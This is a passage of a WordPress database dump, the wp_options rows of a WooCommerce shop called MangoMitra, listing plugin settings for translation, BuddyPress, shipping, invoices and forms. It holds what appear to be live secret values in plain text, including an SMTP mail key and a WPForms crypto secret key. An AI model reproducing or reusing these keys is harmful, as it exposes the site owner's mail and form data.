32:\"index.php?attachment=$matches[1]\";s:37:\"[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\"[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\"[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"([^/]+)/embed/?$\";s:37:\"index.php?name=$matches[1]&embed=true\";s:20:\"([^/]+)/trackback/?$\";s:31:\"index.php?name=$matches[1]&tb=1\";s:40:\"([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:35:\"([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:28:\"([^/]+)/page/?([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&paged=$matches[2]\";s:35:\"([^/]+)/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&cpage=$matches[2]\";s:24:\"([^/]+)(?:/([0-9]+))?/?$\";s:43:\"index.php?name=$matches[1]&page=$matches[2]\";s:16:\"[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:26:\"[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:46:\"[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:22:\"[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";}','yes'),(33805,'plugin_activation_woocommerce-gift-wrapper/woocommerce-gift-wrapper.php','2022-02-14 12:51:34','yes'),(33808,'wcgwp_version','5.0','no'),(33839,'wcgwp_display','a:1:{i:0;s:10:\"after_cart\";}','no'),(33840,'wcgwp_modal','yes','no'),(33841,'wcgwp_show_thumb','yes','no'),(33842,'wcgwp_link','yes','no'),(33843,'wcgwp_number','yes','no'),(33844,'wcgwp_number_max','2','no'),(34123,'wp_mail_smtp_debug','a:0:{}','no'),(34124,'wp_mail_smtp_lite_sent_email_counter','376','yes'),(34125,'wp_mail_smtp_lite_weekly_sent_email_counter','a:11:{s:2:\"07\";i:15;s:2:\"08\";i:108;s:2:\"09\";i:143;i:10;i:44;i:11;i:50;i:12;i:2;i:15;i:2;i:16;i:2;i:41;i:1;i:42;i:3;i:43;i:6;}','yes'),(34190,'plugin_activation_translatepress-multilingual/index.php','2022-02-14 14:26:35','yes'),(34191,'trp_settings','a:14:{s:16:\"default-language\";s:5:\"en_US\";s:21:\"translation-languages\";a:1:{i:0;s:5:\"en_US\";}s:17:\"publish-languages\";a:1:{i:0;s:5:\"en_US\";}s:22:\"native_or_english_name\";s:12:\"english_name\";s:36:\"add-subdirectory-to-default-language\";s:2:\"no\";s:30:\"force-language-to-custom-links\";s:3:\"yes\";s:14:\"trp-ls-floater\";s:3:\"yes\";s:17:\"shortcode-options\";s:16:\"flags-full-names\";s:12:\"menu-options\";s:16:\"flags-full-names\";s:15:\"floater-options\";s:16:\"flags-full-names\";s:16:\"floater-position\";s:12:\"bottom-right\";s:13:\"floater-color\";s:4:\"dark\";s:21:\"trp-ls-show-poweredby\";s:2:\"no\";s:9:\"url-slugs\";a:2:{s:5:\"en_US\";s:2:\"en\";i:0;s:0:\"\";}}','yes'),(34192,'trp_db_stored_data','a:1:{s:17:\"install_timestamp\";i:1644828998;}','yes'),(34193,'trp_plugin_version','2.2.0','yes'),(34232,'GTranslate','a:35:{s:11:\"pro_version\";s:0:\"\";s:18:\"enterprise_version\";s:0:\"\";s:14:\"custom_domains\";s:0:\"\";s:19:\"custom_domains_data\";s:0:\"\";s:15:\"url_translation\";s:0:\"\";s:17:\"add_hreflang_tags\";s:0:\"\";s:17:\"email_translation\";s:0:\"\";s:23:\"email_translation_debug\";s:0:\"\";s:10:\"new_window\";s:0:\"\";s:12:\"show_in_menu\";s:19:\"open-shop-main-menu\";s:26:\"floating_language_selector\";s:2:\"no\";s:21:\"native_language_names\";s:0:\"\";s:23:\"detect_browser_language\";i:1;s:12:\"add_new_line\";i:1;s:16:\"default_language\";s:2:\"en\";s:18:\"translation_method\";s:5:\"onfly\";s:11:\"widget_look\";s:8:\"dropdown\";s:9:\"flag_size\";i:16;s:10:\"flag_style\";s:2:\"2d\";s:16:\"monochrome_flags\";s:0:\"\";s:11:\"widget_code\";s:2630:\"<!-- GTranslate: https://gtranslate.io/ -->\r\n <select onchange=\"doGTranslate(this);\" class=\"notranslate\" id=\"gtranslate_selector\" aria-label=\"Website Language Selector\"><option value=\"\">Select Language</option><option value=\"en|en\">English</option><option value=\"en|gu\">Gujarati</option><option value=\"en|hi\">Hindi</option><option value=\"en|kn\">Kannada</option><option value=\"en|ml\">Malayalam</option><option value=\"en|mr\">Marathi</option><option value=\"en|pa\">Punjabi</option><option value=\"en|ta\">Tamil</option><option value=\"en|te\">Telugu</option></select><style>#goog-gt-tt{display:none!important;}.goog-te-banner-frame{display:none!important;}.goog-te-menu-value:hover{text-decoration:none!important;}.goog-text-highlight{background-color:transparent!important;box-shadow:none!important;}body{top:0!important;}#google_translate_element2{display:none!important;}</style>\r\n<div id=\"google_translate_element2\"></div>\r\n<script>function googleTranslateElementInit2() {new google.translate.TranslateElement({pageLanguage: \'en\',autoDisplay: false}, \'google_translate_element2\');}if(!window.gt_translate_script){window.gt_translate_script=document.createElement(\'script\');gt_translate_script.src=\'https://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit2\';document.body.appendChild(gt_translate_script);}</script>\r\n\r\n<script>\r\nfunction GTranslateGetCurrentLang() {var keyValue = document[\'cookie\'].match(\'(^|;) ?googtrans=([^;]*)(;|$)\');return keyValue ? keyValue[2].split(\'/\')[2] : null;}\r\nfunction GTranslateFireEvent(element,event){try{if(document.createEventObject){var evt=document.createEventObject();element.fireEvent(\'on\'+event,evt)}else{var evt=document.createEvent(\'HTMLEvents\');evt.initEvent(event,true,true);element.dispatchEvent(evt)}}catch(e){}}\r\nfunction doGTranslate(lang_pair){if(lang_pair.value)lang_pair=lang_pair.value;if(lang_pair==\'\')return;var lang=lang_pair.split(\'|\')[1];if(GTranslateGetCurrentLang() == null && lang == lang_pair.split(\'|\')[0])return;if(typeof ga==\'function\'){ga(\'send\', \'event\', \'GTranslate\', lang, location.hostname+location.pathname+location.search);}var teCombo;var sel=document.getElementsByTagName(\'select\');for(var i=0;i<sel.length;i++)if(sel[i].className.indexOf(\'goog-te-combo\')!=-1){teCombo=sel[i];break;}if(document.getElementById(\'google_translate_element2\')==null||document.getElementById(\'google_translate_element2\').innerHTML.length==0||teCombo.length==0||teCombo.innerHTML.length==0){setTimeout(function(){doGTranslate(lang_pair)},500)}else{teCombo.value=lang;GTranslateFireEvent(teCombo,\'change\');GTranslateFireEvent(teCombo,\'change\')}}\r\n</script>\r\n\";s:10:\"incl_langs\";a:9:{i:0;s:2:\"en\";i:1;s:2:\"gu\";i:2;s:2:\"hi\";i:3;s:2:\"kn\";i:4;s:2:\"ml\";i:5;s:2:\"mr\";i:6;s:2:\"pa\";i:7;s:2:\"ta\";i:8;s:2:\"te\";}s:11:\"fincl_langs\";a:9:{i:0;s:2:\"en\";i:1;s:2:\"gu\";i:2;s:2:\"hi\";i:3;s:2:\"kn\";i:4;s:2:\"ml\";i:5;s:2:\"mr\";i:6;s:2:\"pa\";i:7;s:2:\"ta\";i:8;s:2:\"te\";}s:9:\"alt_flags\";a:0:{}s:19:\"switcher_text_color\";s:4:\"#666\";s:20:\"switcher_arrow_color\";s:4:\"#666\";s:21:\"switcher_border_color\";s:4:\"#ccc\";s:25:\"switcher_background_color\";s:4:\"#fff\";s:32:\"switcher_background_shadow_color\";s:7:\"#efefef\";s:31:\"switcher_background_hover_color\";s:4:\"#fff\";s:19:\"dropdown_text_color\";s:4:\"#000\";s:20:\"dropdown_hover_color\";s:4:\"#fff\";s:25:\"dropdown_background_color\";s:4:\"#eee\";s:14:\"language_codes\";s:320:\"af,sq,am,ar,hy,az,eu,be,bn,bs,bg,ca,ceb,ny,zh-CN,zh-TW,co,hr,cs,da,nl,en,eo,et,tl,fi,fr,fy,gl,ka,de,el,gu,ht,ha,haw,iw,hi,hmn,hu,is,ig,id,ga,it,ja,jw,kn,kk,km,ko,ku,ky,lo,la,lv,lt,lb,mk,mg,ms,ml,mt,mi,mr,mn,my,ne,no,ps,fa,pl,pt,pa,ro,ru,sm,gd,sr,st,sn,sd,si,sk,sl,so,es,su,sw,sv,tg,ta,te,th,tr,uk,ur,uz,vi,cy,xh,yi,yo,zu\";s:15:\"language_codes2\";s:320:\"af,sq,am,ar,hy,az,eu,be,bn,bs,bg,ca,ceb,ny,zh-CN,zh-TW,co,hr,cs,da,nl,en,eo,et,tl,fi,fr,fy,gl,ka,de,el,gu,ht,ha,haw,iw,hi,hmn,hu,is,ig,id,ga,it,ja,jw,kn,kk,km,ko,ku,ky,lo,la,lv,lt,lb,mk,mg,ms,ml,mt,mi,mr,mn,my,ne,no,ps,fa,pl,pt,pa,ro,ru,sm,gd,sr,st,sn,sd,si,sk,sl,so,es,su,sw,sv,tg,ta,te,th,tr,uk,ur,uz,vi,cy,xh,yi,yo,zu\";}','yes'),(34233,'plugin_activation_gtranslate/gtranslate.php','2022-02-14 14:31:24','yes'),(34235,'widget_gtranslate','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(34236,'gtranslate_admin_notice','a:3:{s:15:\"two_week_review\";a:3:{s:5:\"start\";s:9:\"2/19/2022\";s:3:\"int\";i:5;s:9:\"dismissed\";i:1;}s:12:\"upgrade_tips\";a:3:{s:5:\"start\";s:9:\"2/16/2022\";s:3:\"int\";i:2;s:9:\"dismissed\";i:1;}s:24:\"deactivate_plugin_weglot\";a:2:{s:5:\"start\";s:9:\"2/14/2022\";s:3:\"int\";i:0;}}','yes'),(34307,'weglot_version','3.5','yes'),(34308,'plugin_activation_weglot/weglot.php','2022-02-14 14:43:02','yes'),(34309,'widget_weglot-translate','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(34310,'themeisle_sdk_notifications','a:2:{s:17:\"last_notification\";a:2:{s:2:\"id\";s:22:\"menu_icons_logger_flag\";s:10:\"display_at\";i:1646200526;}s:24:\"last_notification_active\";i:1646808138;}','yes'),(34843,'plugin_activation_bp-gifts/bp-gifts.php','2022-02-15 10:48:58','yes'),(34857,'bp-deactivated-components','a:0:{}','yes'),(34858,'bp-xprofile-base-group-name','Base','yes'),(34859,'bp-xprofile-fullname-field-name','Name','yes'),(34860,'bp-blogs-first-install','','yes'),(34861,'bp-disable-profile-sync','','yes'),(34862,'hide-loggedout-adminbar','','yes'),(34863,'bp-disable-avatar-uploads','','yes'),(34864,'bp-disable-cover-image-uploads','','yes'),(34865,'bp-disable-group-avatar-uploads','','yes'),(34866,'bp-disable-group-cover-image-uploads','','yes'),(34867,'bp-disable-account-deletion','','yes'),(34868,'bp-disable-blogforum-comments','1','yes'),(34869,'_bp_theme_package_id','nouveau','yes'),(34870,'bp-emails-unsubscribe-salt','LGkyKVFhdmI4fUdBaypEI0wtY1FFQVY4KXwgWio+Ki19KGpGbmFmMGQ1KUZrWzg0JH0sdDMlZXUuMjVdT3JUYA==','yes'),(34871,'bp_restrict_group_creation','','yes'),(34872,'_bp_enable_akismet','1','yes'),(34873,'_bp_enable_heartbeat_refresh','1','yes'),(34874,'_bp_retain_bp_default','','yes'),(34875,'_bp_ignore_deprecated_code','1','yes'),(34876,'widget_bp_core_login_widget','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(34877,'widget_bp_core_members_widget','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(34878,'widget_bp_core_whos_online_widget','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(34879,'widget_bp_core_recently_active_widget','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(34880,'widget_bp_groups_widget','','yes'),(34881,'widget_bp_messages_sitewide_notices_widget','','yes'),(34886,'plugin_activation_buddypress/bp-loader.php','2022-02-15 10:52:00','yes'),(34887,'_transient_sp_bp_gifts_array','','yes'),(34888,'widget_bp_nouveau_sidebar_object_nav_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(34889,'bp-active-components','a:5:{s:8:\"activity\";i:1;s:7:\"members\";i:1;s:8:\"settings\";i:1;s:8:\"xprofile\";i:1;s:13:\"notifications\";i:1;}','yes'),(34890,'bp-pages','a:2:{s:8:\"activity\";i:970;s:7:\"members\";i:971;}','yes'),(34891,'_bp_db_version','13165','yes'),(34894,'widget_bp_latest_activities','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(35279,'_transient_wcfm-notification-message-14','0','yes'),(35551,'pwb-brand_children','a:0:{}','yes'),(35614,'wp_mail_smtp_mail_key','jayA66b/ltcNTdIVkHD9RYMj/LUn+aH8j65Xd4XbbCY=','yes'),(36764,'wcfmmp_installed','1','yes'),(36765,'plugin_activation_wc-multivendor-marketplace/wc-multivendor-marketplace.php','2022-02-17 16:22:21','yes'),(36770,'wcfm_installed','1','yes'),(36771,'plugin_activation_wc-frontend-manager/wc_frontend_manager.php','2022-02-17 16:23:22','yes'),(36786,'wcfmvm_installed','1','yes'),(36787,'plugin_activation_wc-multivendor-membership/wc-multivendor-membership.php','2022-02-17 16:26:48','yes'),(38273,'menu_icons_review_flag','no','yes'),(38467,'_transient_wcfm-notification-enquiry-16','0','yes'),(39013,'woocommerce_task_list_prompt_shown','1','yes'),(39015,'woocommerce_task_list_welcome_modal_dismissed','yes','yes'),(39107,'_transient_wcfm-notification-message-19','1','yes'),(39108,'_transient_wcfm-notification-enquiry-19','0','yes'),(39258,'_transient_wcfm-notification-enquiry-20','0','yes'),(39507,'_transient_wcfm-notification-message-15','1','yes'),(39508,'_transient_wcfm-notification-enquiry-15','0','yes'),(40645,'_transient_wcfm-notification-enquiry-22','0','yes'),(43134,'plugin_activation_wc-cancel-order/wc-cancel-order.php','2022-02-25 11:39:12','yes'),(43146,'wc_cancel_settings','a:4:{s:10:\"req-status\";a:3:{i:0;s:10:\"wc-pending\";i:1;s:13:\"wc-processing\";i:2;s:10:\"wc-on-hold\";}s:13:\"text-required\";i:0;s:12:\"confirm-note\";s:0:\"\";s:12:\"guest-cancel\";s:1:\"1\";}','no'),(45702,'plugin_activation_woocommerce-pdf-invoices-packing-slips/woocommerce-pdf-invoices-packingslips.php','2022-03-03 10:33:41','yes'),(45703,'wpo_wcpdf_random_string','7ffbaca906bc5d016a7907256d32e2a4','yes'),(45704,'wpo_wcpdf_settings_general','a:12:{s:16:\"download_display\";s:7:\"display\";s:13:\"template_path\";s:14:\"default/Simple\";s:10:\"paper_size\";s:2:\"a4\";s:13:\"currency_font\";s:1:\"1\";s:11:\"header_logo\";s:3:\"693\";s:18:\"header_logo_height\";s:0:\"\";s:9:\"shop_name\";a:1:{s:7:\"default\";s:10:\"MangoMitra\";}s:12:\"shop_address\";a:1:{s:7:\"default\";s:0:\"\";}s:6:\"footer\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_1\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_2\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_3\";a:1:{s:7:\"default\";s:0:\"\";}}','yes'),(45705,'wpo_wcpdf_documents_settings_invoice','a:7:{s:24:\"display_shipping_address\";s:1:\"1\";s:13:\"display_email\";s:1:\"1\";s:13:\"display_phone\";s:1:\"1\";s:12:\"display_date\";s:12:\"invoice_date\";s:14:\"display_number\";s:14:\"invoice_number\";s:19:\"attach_to_email_ids\";a:15:{s:9:\"new_order\";s:1:\"1\";s:15:\"cancelled_order\";s:1:\"1\";s:12:\"failed_order\";s:0:\"\";s:22:\"customer_on_hold_order\";s:0:\"\";s:25:\"customer_processing_order\";s:0:\"\";s:24:\"customer_completed_order\";s:0:\"\";s:23:\"customer_refunded_order\";s:0:\"\";s:16:\"customer_invoice\";s:1:\"1\";s:13:\"customer_note\";s:0:\"\";s:11:\"new-enquiry\";s:0:\"\";s:15:\"store-new-order\";s:0:\"\";s:18:\"email-verification\";s:0:\"\";s:26:\"wc_cancel_request_received\";s:0:\"\";s:26:\"wc_cancel_request_approved\";s:0:\"\";s:26:\"wc_cancel_request_declined\";s:0:\"\";}s:7:\"enabled\";i:1;}','yes'),(45706,'wpo_wcpdf_documents_settings_packing-slip','a:1:{s:7:\"enabled\";i:1;}','yes'),(45707,'wpo_wcpdf_settings_debug','a:3:{s:14:\"enable_cleanup\";s:1:\"1\";s:12:\"cleanup_days\";s:1:\"7\";s:30:\"reload_attachment_translations\";s:1:\"1\";}','yes'),(45710,'wpo_wcpdf_version','4.4.0','yes'),(45904,'wpo_wcpdf_installed_template_paths','a:1:{s:112:\"/storage/v6964/mangomitra/public_html/wp-content/plugins/woocommerce-pdf-invoices-packing-slips/templates/Simple\";s:14:\"default/Simple\";}','yes'),(45959,'woocommerce_customer_invoice_settings','a:6:{s:7:\"subject\";s:0:\"\";s:7:\"heading\";s:0:\"\";s:12:\"subject_paid\";s:0:\"\";s:12:\"heading_paid\";s:0:\"\";s:18:\"additional_content\";s:28:\"Thanks for using {site_url}!\";s:10:\"email_type\";s:4:\"html\";}','yes'),(46772,'flexible-shipping-activation-redirected','1','yes'),(46773,'plugin_activation_flexible-shipping/flexible-shipping.php','2022-03-03 11:31:57','yes'),(46774,'flexible_shipping_rate_notice_date_dismiss','2022-03-17 06:01:59','yes'),(46775,'fs_method_created_tracker','2','yes'),(46816,'flexible_shipping_onboarding_table_rate','a:4:{s:6:\"clicks\";i:0;s:5:\"event\";s:5:\"close\";s:15:\"auto_show_popup\";i:1;s:4:\"step\";i:0;}','yes'),(46826,'flexible_shipping_method_settings_saved','1646307403','yes'),(46827,'woocommerce_flexible_shipping_single_6_settings','a:19:{s:22:\"title_general_settings\";s:0:\"\";s:12:\"method_title\";s:17:\"Flexible Shipping\";s:18:\"method_description\";s:0:\"\";s:11:\"tax_heading\";s:0:\"\";s:10:\"tax_status\";s:7:\"taxable\";s:18:\"prices_include_tax\";s:2:\"no\";s:19:\"title_free_shipping\";s:0:\"\";s:20:\"method_free_shipping\";s:3:\"500\";s:26:\"method_free_shipping_label\";s:4:\"Free\";s:32:\"method_free_shipping_cart_notice\";s:3:\"yes\";s:22:\"title_cost_calculation\";s:0:\"\";s:25:\"method_calculation_method\";s:3:\"sum\";s:16:\"cart_calculation\";s:4:\"cart\";s:22:\"title_advanced_options\";s:0:\"\";s:17:\"method_visibility\";s:3:\"yes\";s:17:\"method_debug_mode\";s:3:\"yes\";s:12:\"method_rules\";s:744:\"[\n    {\n        \"conditions\": [\n            {\n                \"condition_id\": \"value\",\n                \"min\": \"1\",\n                \"max\": \"250\"\n            }\n        ],\n        \"cost_per_order\": \"30\",\n        \"additional_costs\": [],\n        \"special_action\": \"\"\n    },\n    {\n        \"conditions\": [\n            {\n                \"condition_id\": \"value\",\n                \"min\": \"251\",\n                \"max\": \"499\"\n            }\n        ],\n        \"cost_per_order\": \"25\",\n        \"additional_costs\": [],\n        \"special_action\": \"\"\n    },\n    {\n        \"conditions\": [\n            {\n                \"condition_id\": \"none\"\n            }\n        ],\n        \"cost_per_order\": \"\",\n        \"additional_costs\": [],\n        \"special_action\": \"\"\n    }\n]\";s:15:\"id_for_shipping\";s:26:\"flexible_shipping_single:6\";s:5:\"title\";s:17:\"Flexible Shipping\";}','yes'),(46977,'fs-predefined-scenarios-tracking-data','a:3:{s:13:\"scenario_used\";s:3:\"yes\";s:14:\"scenario_count\";a:1:{s:12:\"simple_value\";i:5;}s:15:\"saved_scenarios\";i:0;}','no'),(47053,'flexible_shipping_debug_was_enabled','1','yes'),(47065,'wpdesk_helper_options','a:1:{s:20:\"wpdesk_tracker_agree\";s:1:\"1\";}','yes'),(47066,'wpdesk_tracker_last_send','1746944588','yes'),(47067,'wpdesk_tracker_unique_hash','775bb69e3ebbf15d42c6714c907afc7d','yes'),(47075,'flexible_shipping_debug_notice_added','1','yes'),(47110,'woocommerce_flexible_shipping_info_settings','a:4:{s:17:\"flexible_shipping\";s:0:\"\";i:0;s:0:\"\";s:9:\"debug_log\";s:3:\"yes\";i:1;s:0:\"\";}','yes'),(47111,'fs_logger_enabled','1','yes'),(47252,'plugin_activation_flexible-shipping-fedex/flexible-shipping-fedex.php','2022-03-03 12:03:14','yes'),(47333,'plugin_activation_advanced-free-flat-shipping-woocommerce/extended-flat-rate-shipping-woocommerce.php','2022-03-03 12:11:55','yes'),(47334,'pi_review_activation_date_advanced-free-flat-shipping-woocommerce','2022/03/03','yes'),(47340,'pi_efrs_installation_date','2022-03-03','yes'),(47375,'woocommerce_pisol_extended_flat_shipping_settings','a:0:{}','yes'),(47605,'woocommerce_no_sales_tax','1','yes'),(47848,'_transient_afrsm-admin-notice','1','yes'),(47851,'afrsm_version','4.0.2','yes'),(47852,'chk_enable_logging','off','yes'),(47853,'zone_migration','done','yes'),(47854,'plugin_activation_woo-extra-flat-rate/advanced-flat-rate-shipping-for-woocommerce.php','2022-03-03 12:49:31','yes'),(47884,'matched_method','a:1:{i:0;i:1027;}','yes'),(47948,'sm_sortable_order_en','a:2:{i:0;i:1028;i:1;i:1027;}','yes'),(48113,'md_woocommerce_shipping_method_format','radio_button_mode','yes'),(48114,'afrsm_force_customer_to_select_sm','on','yes'),(48115,'afrsm_sm_count_per_page','','yes'),(48157,'plugin_activation_advanced-table-rate-shipping-for-woocommerce/aco-table-rate-shipping.php','2022-03-03 13:09:54','yes'),(48178,'acotrs_shipping__settings','a:5:{s:7:\"general\";a:7:{s:5:\"title\";s:5:\"Title\";s:10:\"tax_status\";s:7:\"taxable\";s:9:\"base_rule\";s:0:\"\";s:12:\"handlingfree\";s:2:\"11\";s:8:\"flatrate\";s:2:\"10\";s:26:\"shipping_option_appear_for\";s:8:\"everyone\";s:12:\"ship_to_role\";s:0:\"\";}s:16:\"shipping_by_city\";a:4:{s:6:\"enable\";i:1;s:13:\"desable_other\";i:0;s:9:\"region_is\";s:9:\"excluding\";s:12:\"allowed_city\";s:9:\"karnataka\";}s:6:\"method\";a:4:{s:6:\"volume\";s:0:\"\";s:7:\"operand\";s:1:\"/\";s:14:\"exclude_weight\";i:0;s:15:\"method_condtion\";a:0:{}}s:19:\"additional_settings\";a:8:{s:17:\"ad_exclude_weight\";i:0;s:18:\"ad_include_coupons\";i:0;s:15:\"ad_round_weight\";i:0;s:19:\"ad_hide_this_method\";i:1;s:20:\"ad_hide_other_method\";i:0;s:34:\"ad_set_delivery_date_automatically\";i:0;s:35:\"ad_get_minimum_value_from_condition\";i:0;s:20:\"ad_single_class_only\";s:8:\"disabled\";}s:14:\"table_of_rates\";a:2:{i:0;a:3:{s:5:\"title\";s:11:\"first title\";s:4:\"rows\";a:2:{i:0;a:3:{s:5:\"costs\";a:2:{i:0;a:2:{s:9:\"cost_unit\";s:0:\"\";s:4:\"cost\";s:2:\"21\";}i:1;a:1:{s:9:\"cost_unit\";s:0:\"\";}}s:10:\"conditions\";a:1:{i:0;a:4:{s:9:\"condition\";s:8:\"subtotal\";s:12:\"delivery_day\";i:0;s:7:\"compair\";s:9:\"less_than\";s:6:\"cvalue\";s:3:\"100\";}}s:2:\"id\";s:1:\"0\";}i:1;a:3:{s:5:\"costs\";a:1:{i:0;a:2:{s:9:\"cost_unit\";s:0:\"\";s:4:\"cost\";s:2:\"10\";}}s:10:\"conditions\";a:1:{i:0;a:4:{s:9:\"condition\";s:8:\"subtotal\";s:12:\"delivery_day\";i:0;s:7:\"compair\";s:9:\"less_than\";s:6:\"cvalue\";s:3:\"200\";}}s:2:\"id\";s:1:\"1\";}}s:9:\"option_id\";i:1;}i:1;a:2:{s:5:\"title\";s:18:\"Shipping Option #2\";s:9:\"option_id\";i:2;}}}','yes'),(50057,'plugin_activation_wc-pre-order/pre-order.php','2022-03-03 16:35:43','yes'),(50277,'plugin_activation_pre-orders-for-woocommerce/main.php','2022-03-03 16:44:02','yes'),(55628,'plugin_activation_custom-shipping-methods-for-woocommerce/custom-shipping-methods-for-woocommerce.php','2022-03-07 12:13:58','yes'),(55631,'alg_wc_custom_shipping_methods_version','1.9.1','yes'),(56331,'plugin_activation_yith-pre-order-for-woocommerce/init.php','2022-03-07 12:58:15','yes'),(57520,'plugin_activation_wt-woocommerce-sequential-order-numbers/wt-advanced-order-number.php','2022-03-07 15:26:25','yes'),(58479,'bookacti_version','1.13.0','yes'),(58480,'plugin_activation_booking-activities/booking-activities.php','2022-03-07 17:36:17','yes'),(58531,'plugin_activation_woocommerce-bulk-order-form/wc-bulk-order-form.php','2022-03-07 17:45:00','yes'),(58532,'wpo_wc_bof_version','3.7.1','yes'),(58533,'wc_bof_general','a:12:{s:20:\"wc_bof_template_type\";s:8:\"standard\";s:17:\"wc_bof_no_of_rows\";s:2:\"10\";s:16:\"wc_bof_max_items\";s:1:\"0\";s:27:\"wc_bof_exclude_out_of_stock\";b:1;s:23:\"wc_bof_single_addtocart\";b:1;s:15:\"wc_bof_add_rows\";b:1;s:17:\"wc_bof_show_image\";b:1;s:17:\"wc_bof_show_price\";b:1;s:20:\"wc_bof_action_button\";s:4:\"cart\";s:20:\"wc_bof_auto_redirect\";b:0;s:18:\"wc_bof_image_width\";s:2:\"50\";s:19:\"wc_bof_image_height\";s:2:\"50\";}','yes'),(58534,'wc_bof_products','a:8:{s:15:\"wc_bof_category\";s:0:\"\";s:15:\"wc_bof_excluded\";s:0:\"\";s:15:\"wc_bof_included\";s:0:\"\";s:16:\"wc_bof_search_by\";s:3:\"all\";s:31:\"wc_bof_enable_search_attributes\";s:0:\"\";s:25:\"wc_bof_product_attributes\";s:0:\"\";s:20:\"wc_bof_result_format\";s:3:\"TPS\";s:30:\"wc_bof_result_variation_format\";s:3:\"TPS\";}','yes'),(58535,'wc_bof_template_label','a:8:{s:18:\"wc_bof_price_label\";s:5:\"Price\";s:20:\"wc_bof_product_label\";s:7:\"Product\";s:21:\"wc_bof_quantity_label\";s:3:\"Qty\";s:22:\"wc_bof_variation_label\";s:9:\"Variation\";s:18:\"wc_bof_total_label\";s:5:\"Total\";s:29:\"wc_bof_single_addtocart_label\";s:11:\"Add to cart\";s:17:\"wc_bof_cart_label\";s:4:\"Cart\";s:21:\"wc_bof_checkout_label\";s:8:\"Checkout\";}','yes'),(61112,'menu_icons_logger_flag','no','yes'),(61167,'wpforms_version','1.7.2.1','yes'),(61168,'wpforms_version_lite','1.7.2.1','yes'),(61169,'wpforms_activated','a:1:{s:4:\"lite\";i:1646808286;}','yes'),(61174,'plugin_activation_wpforms-lite/wpforms.php','2022-03-09 12:14:46','yes'),(61175,'widget_wpforms-widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(61176,'wpforms_admin_notices','a:2:{s:14:\"review_request\";a:2:{s:4:\"time\";i:1646808287;s:9:\"dismissed\";b:0;}s:19:\"review_lite_request\";a:2:{s:4:\"time\";i:1665738338;s:9:\"dismissed\";b:1;}}','yes'),(61177,'_transient_wpforms_htaccess_file','a:3:{s:4:\"size\";i:737;s:5:\"mtime\";i:1705014310;s:5:\"ctime\";i:1705014310;}','yes'),(61180,'wpforms_builder_opened_date','1646808336','no'),(61188,'wpforms_forms_first_created','1646808385','no'),(61259,'wpforms_crypto_secret_key','kG60U7LFB6rzteEbNi+KH61qLAxRplB5np1kH0oKNao=','yes'),(61962,'sc_display_global_coupons','1230','no'),(63197,'plugin_activation_shared-files/shared-files.php','2022-03-10 11:23:46','yes'),(63198,'shared_files_settings','a:11:{s:20:\"hide_bandwidth_usage\";s:2:\"on\";s:15:\"card_background\";s:10:\"light_gray\";s:15:\"preview_service\";s:9:\"microsoft\";s:29:\"uncheck_hide_from_other_pages\";s:2:\"on\";s:18:\"always_preview_pdf\";s:2:\"on\";s:18:\"bypass_preview_pdf\";s:2:\"on\";s:15:\"pagination_type\";s:8:\"improved\";s:28:\"wp_engine_compatibility_mode\";s:2:\"on\";s:47:\"show_file_upload_checkboxes_on_multiple_columns\";s:2:\"on\";s:20:\"show_download_button\";s:2:\"on\";s:21:\"show_download_counter\";s:2:\"on\";}','yes'),(63199,'shared_files_version','1.6.74','yes'),(63200,'shared_files_rating_notice_date','O:8:\"DateTime\":3:{s:4:\"date\";s:26:\"2022-05-05 05:53:47.729739\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}','no'),(63249,'plugin_activation_file-upload-types/file-upload-types.php','2022-03-10 11:32:47','yes'),(63258,'file_upload_types_multiple_mimes','enabled','yes'),(63259,'file_upload_types','a:2:{s:7:\"enabled\";a:1:{i:0;s:4:\".wps\";}s:6:\"custom\";a:0:{}}','yes'),(63272,'wfu_environment_variables','a:1:{s:22:\"WFU_US_HANDLER_CHANGED\";s:4:\"true\";}','yes'),(63273,'plugin_activation_wp-file-upload/wordpress_file_upload.php','2022-03-10 